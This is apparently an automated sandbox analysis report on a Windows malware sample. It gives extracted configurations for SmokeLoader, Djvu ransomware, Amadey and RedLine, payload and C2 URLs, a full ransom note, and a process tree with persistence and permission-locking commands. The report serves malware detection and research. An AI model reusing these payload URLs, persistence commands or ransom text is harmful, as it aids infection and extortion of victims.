Analysis
max time kernel: 119s
max time network: 152s
platform: windows10-1703_x64
resource: win10-20230220-en
resource tags: arch:x64, arch:x86, image:win10-20230220-en, locale:en-us, os:windows10-1703-x64, system
submitted: 27-03-2023 07:46
Static task: static1
Behavioral task: behavioral1
Sample: dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe
Resource: win10-20230220-en
General
Target: dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe
Size: 259KB
MD5: 37d059689141316003e150dc31a34c23
SHA1: c5ec49918d6b6730c81d2a4285bb2445553dcd02
SHA256: dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630
SHA512: 4c0b8f91fd8486c7737698ac00add93398c4fffb59b0bc59a9793e119d0737f08517368550f8f9604ac198d8538c5efa1bd7291d8cd59addb9f1b112640698c6
SSDEEP: 3072:5TlmjeeWXQDwL/5qiFexXUKaKO9y4oeeW2BfsfBXYjzBJzVrsNME4Cs5xbKuEXq:5YXDwLgimX5GdeDBfsJXYjzbiNP45zE
Malware Config
Extracted
smokeloader
2022
Extracted
djvu
http://zexeq.com/lancer/get.php
extension: .typo
offline_id: Yao2o6f5vNghOpgVBhEIA8O96SC5vLcgITgaRMt1
payload_url:
  http://uaery.top/dl/build2.exe
  http://zexeq.com/files/1/build3.exe
ransomnote: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-f8UEvx4T0A Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0672IsjO
Extracted
smokeloader
pub1
Extracted
smokeloader
sprg
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
redline
koreamon
koreamonitoring.com:80
auth_value: 1a0e1a9f491ef3df873a03577dfa10aa
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detected Djvu ransomware 16 IoCs
Processes:
resource  yara_rule
behavioral1/memory/4280-135-0x00000000048D0000-0x00000000049EB000-memory.dmp  family_djvu
behavioral1/memory/4296-136-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/4296-138-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/4296-139-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/4296-140-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/4296-161-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/1148-168-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/1148-169-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/1148-174-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/1148-175-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/1148-176-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/1148-181-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/1148-183-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/1148-184-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/1148-189-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
behavioral1/memory/1148-205-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies security service 2 TTPs 5 IoCs
Processes:
description  ioc  process
Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0  reg.exe
Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1  reg.exe
Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo  reg.exe
Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters  reg.exe
Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security  reg.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 13 IoCs
Processes:
resource  yara_rule
behavioral1/memory/4256-295-0x00000000026B0000-0x000000000270A000-memory.dmp  family_redline
behavioral1/memory/4256-301-0x0000000002870000-0x00000000028C6000-memory.dmp  family_redline
behavioral1/memory/4256-302-0x0000000002870000-0x00000000028C2000-memory.dmp  family_redline
behavioral1/memory/4256-303-0x0000000002870000-0x00000000028C2000-memory.dmp  family_redline
behavioral1/memory/4256-305-0x0000000002870000-0x00000000028C2000-memory.dmp  family_redline
behavioral1/memory/4256-307-0x0000000002870000-0x00000000028C2000-memory.dmp  family_redline
behavioral1/memory/4256-309-0x0000000002870000-0x00000000028C2000-memory.dmp  family_redline
behavioral1/memory/4256-311-0x0000000002870000-0x00000000028C2000-memory.dmp  family_redline
behavioral1/memory/4256-313-0x0000000002870000-0x00000000028C2000-memory.dmp  family_redline
behavioral1/memory/4256-315-0x0000000002870000-0x00000000028C2000-memory.dmp  family_redline
behavioral1/memory/4256-317-0x0000000002870000-0x00000000028C2000-memory.dmp  family_redline
behavioral1/memory/4256-319-0x0000000002870000-0x00000000028C2000-memory.dmp  family_redline
behavioral1/memory/4256-322-0x0000000002870000-0x00000000028C2000-memory.dmp  family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
description  pid  process  target process
PID 5088 created 2068  5088  XandETC.exe  Explorer.EXE
PID 5088 created 2068  5088  XandETC.exe  Explorer.EXE
PID 5088 created 2068  5088  XandETC.exe  Explorer.EXE
PID 5088 created 2068  5088  XandETC.exe  Explorer.EXE
PID 5088 created 2068  5088  XandETC.exe  Explorer.EXE
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
pid  process
2068  Explorer.EXE
Executes dropped EXE 25 IoCs
Processes:
pid  process
4280  DA96.exe
4296  DA96.exe
4508  E584.exe
956  E71B.exe
4720  DA96.exe
1148  DA96.exe
360  FFC4.exe
4820  14C.exe
4344  build3.exe
708  97B.exe
4632  Player3.exe
4900  ss31.exe
5088  XandETC.exe
864  nbveek.exe
164  1802.exe
2176  1F18.exe
396  Player3.exe
1352  21D8.exe
4256  6AC9.exe
704  nbveek.exe
4700  mstsca.exe
4896  9B31.bat.exe
4376  CCE0.exe
1584  updater.exe
3136  JGAbA.bat.exe
Loads dropped DLL 3 IoCs
Processes:
pid  process
752  rundll32.exe
3728  rundll32.exe
4440  rundll32.exe
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook  dllhost.exe
Key opened  \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook  dllhost.exe
Key opened  \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook  dllhost.exe
Key opened  \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook  dllhost.exe
Key opened  \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook  dllhost.exe
Key opened  \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  dllhost.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description  ioc  process
Set value (str)  \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\d816343c-10e1-4037-9d01-b50f4c7070f1\\DA96.exe\" --AutoStart"  DA96.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
10  api.2ip.ua
22  api.2ip.ua
9  api.2ip.ua
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
pid  process
4376  CCE0.exe
4376  CCE0.exe
4376  CCE0.exe
Suspicious use of SetThreadContext 2 IoCs
Processes:
description  pid  process  target process
PID 4280 set thread context of 4296  4280  DA96.exe  DA96.exe
PID 4720 set thread context of 1148  4720  DA96.exe  DA96.exe
Drops file in Program Files directory 1 IoCs
Processes:
description  ioc  process
File created  C:\Program Files\Notepad\Chrome\updater.exe  XandETC.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid  process
1564  sc.exe
3356  sc.exe
428  sc.exe
5036  sc.exe
996  sc.exe
3916  sc.exe
3216  sc.exe
3076  sc.exe
3364  sc.exe
620  sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
Processes:
pid  pid_target  process  target process
4616  956  WerFault.exe  E71B.exe
1840  4820  WerFault.exe  14C.exe
1204  164  WerFault.exe  1802.exe
2896  1352  WerFault.exe  21D8.exe
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description  ioc  process
Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  FFC4.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  1F18.exe
Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  1F18.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe
Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  E584.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  FFC4.exe
Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  1F18.exe
Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe
Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  E584.exe
Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  E584.exe
Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  FFC4.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description  ioc  process
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  dllhost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  dllhost.exe
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid  process
3364  schtasks.exe
1844  schtasks.exe
1896  schtasks.exe
Modifies registry class 1 IoCs
Processes:
description  ioc  process
Key created  \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings  9B31.bat.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid  process
3956  dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe
3956  dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid  process
2068  Explorer.EXE
Suspicious behavior: MapViewOfSection 22 IoCs
Processes:
pid  process
3956  dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe
4508  E584.exe
360  FFC4.exe
2176  1F18.exe
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
2068  Explorer.EXE
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description  pid  process
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeShutdownPrivilege  2068  Explorer.EXE
Token: SeCreatePagefilePrivilege  2068  Explorer.EXE
Token: SeDebugPrivilege  4256  6AC9.exe
Token: SeDebugPrivilege  2664  powershell.exe
Token: SeDebugPrivilege  4896  9B31.bat.exe
Token: SeDebugPrivilege  3640  powershell.exe
Token: SeDebugPrivilege  3352  powershell.exe
Token: SeDebugPrivilege  4860  powershell.exe
Token: SeIncreaseQuotaPrivilege  3640  powershell.exe
Token: SeSecurityPrivilege  3640  powershell.exe
Token: SeTakeOwnershipPrivilege  3640  powershell.exe
Token: SeLoadDriverPrivilege  3640  powershell.exe
Token: SeSystemProfilePrivilege  3640  powershell.exe
Token: SeSystemtimePrivilege  3640  powershell.exe
Token: SeProfSingleProcessPrivilege  3640  powershell.exe
Token: SeIncBasePriorityPrivilege  3640  powershell.exe
Token: SeCreatePagefilePrivilege  3640  powershell.exe
Token: SeBackupPrivilege  3640  powershell.exe
Token: SeRestorePrivilege  3640  powershell.exe
Token: SeShutdownPrivilege  3640  powershell.exe
Token: SeDebugPrivilege  3640  powershell.exe
Token: SeSystemEnvironmentPrivilege  3640  powershell.exe
Token: SeRemoteShutdownPrivilege  3640  powershell.exe
Token: SeUndockPrivilege  3640  powershell.exe
Token: SeManageVolumePrivilege  3640  powershell.exe
Token: 33  3640  powershell.exe
Token: 34  3640  powershell.exe
Token: 35  3640  powershell.exe
Token: 36  3640  powershell.exe
Token: SeDebugPrivilege  4292  powershell.exe
Token: SeShutdownPrivilege  3132  powercfg.exe
Token: SeCreatePagefilePrivilege  3132  powercfg.exe
Token: SeShutdownPrivilege  3412  powercfg.exe
Token: SeCreatePagefilePrivilege  3412  powercfg.exe
Token: SeShutdownPrivilege  4836  powercfg.exe
Token: SeCreatePagefilePrivilege  4836  powercfg.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description  pid  process  target process
PID 2068 wrote to memory of 4280  2068  Explorer.EXE  DA96.exe
PID 2068 wrote to memory of 4280  2068  Explorer.EXE  DA96.exe
PID 2068 wrote to memory of 4280  2068  Explorer.EXE  DA96.exe
PID 4280 wrote to memory of 4296  4280  DA96.exe  DA96.exe
PID 4280 wrote to memory of 4296  4280  DA96.exe  DA96.exe
PID 4280 wrote to memory of 4296  4280  DA96.exe  DA96.exe
PID 4280 wrote to memory of 4296  4280  DA96.exe  DA96.exe
PID 4280 wrote to memory of 4296  4280  DA96.exe  DA96.exe
PID 4280 wrote to memory of 4296  4280  DA96.exe  DA96.exe
PID 4280 wrote to memory of 4296  4280  DA96.exe  DA96.exe
PID 4280 wrote to memory of 4296  4280  DA96.exe  DA96.exe
PID 4280 wrote to memory of 4296  4280  DA96.exe  DA96.exe
PID 4280 wrote to memory of 4296  4280  DA96.exe  DA96.exe
PID 4296 wrote to memory of 1012  4296  DA96.exe  icacls.exe
PID 4296 wrote to memory of 1012  4296  DA96.exe  icacls.exe
PID 4296 wrote to memory of 1012  4296  DA96.exe  icacls.exe
PID 2068 wrote to memory of 4508  2068  Explorer.EXE  E584.exe
PID 2068 wrote to memory of 4508  2068  Explorer.EXE  E584.exe
PID 2068 wrote to memory of 4508  2068  Explorer.EXE  E584.exe
PID 4296 wrote to memory of 4720  4296  DA96.exe  DA96.exe
PID 4296 wrote to memory of 4720  4296  DA96.exe  DA96.exe
PID 4296 wrote to memory of 4720  4296  DA96.exe  DA96.exe
PID 2068 wrote to memory of 956  2068  Explorer.EXE  E71B.exe
PID 2068 wrote to memory of 956  2068  Explorer.EXE  E71B.exe
PID 2068 wrote to memory of 956  2068  Explorer.EXE  E71B.exe
PID 4720 wrote to memory of 1148  4720  DA96.exe  DA96.exe
PID 4720 wrote to memory of 1148  4720  DA96.exe  DA96.exe
PID 4720 wrote to memory of 1148  4720  DA96.exe  DA96.exe
PID 4720 wrote to memory of 1148  4720  DA96.exe  DA96.exe
PID 4720 wrote to memory of 1148  4720  DA96.exe  DA96.exe
PID 4720 wrote to memory of 1148  4720  DA96.exe  DA96.exe
PID 4720 wrote to memory of 1148  4720  DA96.exe  DA96.exe
PID 4720 wrote to memory of 1148  4720  DA96.exe  DA96.exe
PID 4720 wrote to memory of 1148  4720  DA96.exe  DA96.exe
PID 4720 wrote to memory of 1148  4720  DA96.exe  DA96.exe
PID 2068 wrote to memory of 360  2068  Explorer.EXE  FFC4.exe
PID 2068 wrote to memory of 360  2068  Explorer.EXE  FFC4.exe
PID 2068 wrote to memory of 360  2068  Explorer.EXE  FFC4.exe
PID 2068 wrote to memory of 4820  2068  Explorer.EXE  14C.exe
PID 2068 wrote to memory of 4820  2068  Explorer.EXE  14C.exe
PID 2068 wrote to memory of 4820  2068  Explorer.EXE  14C.exe
PID 1148 wrote to memory of 4344  1148  DA96.exe  build3.exe
PID 1148 wrote to memory of 4344  1148  DA96.exe  build3.exe
PID 1148 wrote to memory of 4344  1148  DA96.exe  build3.exe
PID 4344 wrote to memory of 3364  4344  build3.exe  schtasks.exe
PID 4344 wrote to memory of 3364  4344  build3.exe  schtasks.exe
PID 4344 wrote to memory of 3364  4344  build3.exe  schtasks.exe
PID 2068 wrote to memory of 708  2068  Explorer.EXE  97B.exe
PID 2068 wrote to memory of 708  2068  Explorer.EXE  97B.exe
PID 2068 wrote to memory of 708  2068  Explorer.EXE  97B.exe
PID 708 wrote to memory of 4632  708  97B.exe  Player3.exe
PID 708 wrote to memory of 4632  708  97B.exe  Player3.exe
PID 708 wrote to memory of 4632  708  97B.exe  Player3.exe
PID 708 wrote to memory of 4900  708  97B.exe  ss31.exe
PID 708 wrote to memory of 4900  708  97B.exe  ss31.exe
PID 708 wrote to memory of 5088  708  97B.exe  XandETC.exe
PID 708 wrote to memory of 5088  708  97B.exe  XandETC.exe
PID 4632 wrote to memory of 864  4632  Player3.exe  nbveek.exe
PID 4632 wrote to memory of 864  4632  Player3.exe  nbveek.exe
PID 4632 wrote to memory of 864  4632  Player3.exe  nbveek.exe
PID 864 wrote to memory of 1844  864  nbveek.exe  schtasks.exe
PID 864 wrote to memory of 1844  864  nbveek.exe  schtasks.exe
PID 864 wrote to memory of 1844  864  nbveek.exe  schtasks.exe
PID 864 wrote to memory of 420  864  nbveek.exe  cmd.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook  dllhost.exe
outlook_win_path 1 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  dllhost.exe
Processes

depth 1: C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
  - Deletes itself
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  depth 2: C:\Users\Admin\AppData\Local\Temp\dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

  depth 2: C:\Users\Admin\AppData\Local\Temp\DA96.exe
    command line: C:\Users\Admin\AppData\Local\Temp\DA96.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

    depth 3: C:\Users\Admin\AppData\Local\Temp\DA96.exe
      command line: C:\Users\Admin\AppData\Local\Temp\DA96.exe
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory

      depth 4: C:\Windows\SysWOW64\icacls.exe
        command line: icacls "C:\Users\Admin\AppData\Local\d816343c-10e1-4037-9d01-b50f4c7070f1" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        - Modifies file permissions

      depth 4: C:\Users\Admin\AppData\Local\Temp\DA96.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\DA96.exe" --Admin IsNotAutoStart IsNotTask
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious use of WriteProcessMemory

        depth 5: C:\Users\Admin\AppData\Local\Temp\DA96.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\DA96.exe" --Admin IsNotAutoStart IsNotTask
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory

          depth 6: C:\Users\Admin\AppData\Local\4e9ade8e-467d-4b51-b2ef-1e54941d7f86\build3.exe
            command line: "C:\Users\Admin\AppData\Local\4e9ade8e-467d-4b51-b2ef-1e54941d7f86\build3.exe"
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory

            depth 7: C:\Windows\SysWOW64\schtasks.exe
              command line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
              - Creates scheduled task(s)

  depth 2: C:\Users\Admin\AppData\Local\Temp\E584.exe
    command line: C:\Users\Admin\AppData\Local\Temp\E584.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

  depth 2: C:\Users\Admin\AppData\Local\Temp\E71B.exe
    command line: C:\Users\Admin\AppData\Local\Temp\E71B.exe
    - Executes dropped EXE

    depth 3: C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 476
      - Program crash

  depth 2: C:\Users\Admin\AppData\Local\Temp\FFC4.exe
    command line: C:\Users\Admin\AppData\Local\Temp\FFC4.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

  depth 2: C:\Users\Admin\AppData\Local\Temp\14C.exe
    command line: C:\Users\Admin\AppData\Local\Temp\14C.exe
    - Executes dropped EXE

    depth 3: C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 480
      - Program crash

  depth 2: C:\Users\Admin\AppData\Local\Temp\97B.exe
    command line: C:\Users\Admin\AppData\Local\Temp\97B.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    depth 3: C:\Users\Admin\AppData\Local\Temp\Player3.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

      depth 4: C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        depth 5: C:\Windows\SysWOW64\schtasks.exe
          command line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
          - Creates scheduled task(s)

        depth 5: C:\Windows\SysWOW64\cmd.exe
          command line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit

          depth 6: C:\Windows\SysWOW64\cmd.exe
            command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"

          depth 6: C:\Windows\SysWOW64\cacls.exe
            command line: CACLS "nbveek.exe" /P "Admin:N"

          depth 6: C:\Windows\SysWOW64\cacls.exe
            command line: CACLS "nbveek.exe" /P "Admin:R" /E

          depth 6: C:\Windows\SysWOW64\cacls.exe
            command line: CACLS "..\16de06bfb4" /P "Admin:N"

          depth 6: C:\Windows\SysWOW64\cmd.exe
            command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"

          depth 6: C:\Windows\SysWOW64\cacls.exe
            command line: CACLS "..\16de06bfb4" /P "Admin:R" /E

        depth 5: C:\Windows\SysWOW64\rundll32.exe
          command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
          - Loads dropped DLL

          depth 6: C:\Windows\system32\rundll32.exe
            command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
            - Loads dropped DLL

        depth 5: C:\Windows\SysWOW64\rundll32.exe
          command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main
          - Loads dropped DLL

    depth 3: C:\Users\Admin\AppData\Local\Temp\ss31.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\ss31.exe"
      - Executes dropped EXE

    depth 3: C:\Users\Admin\AppData\Local\Temp\XandETC.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
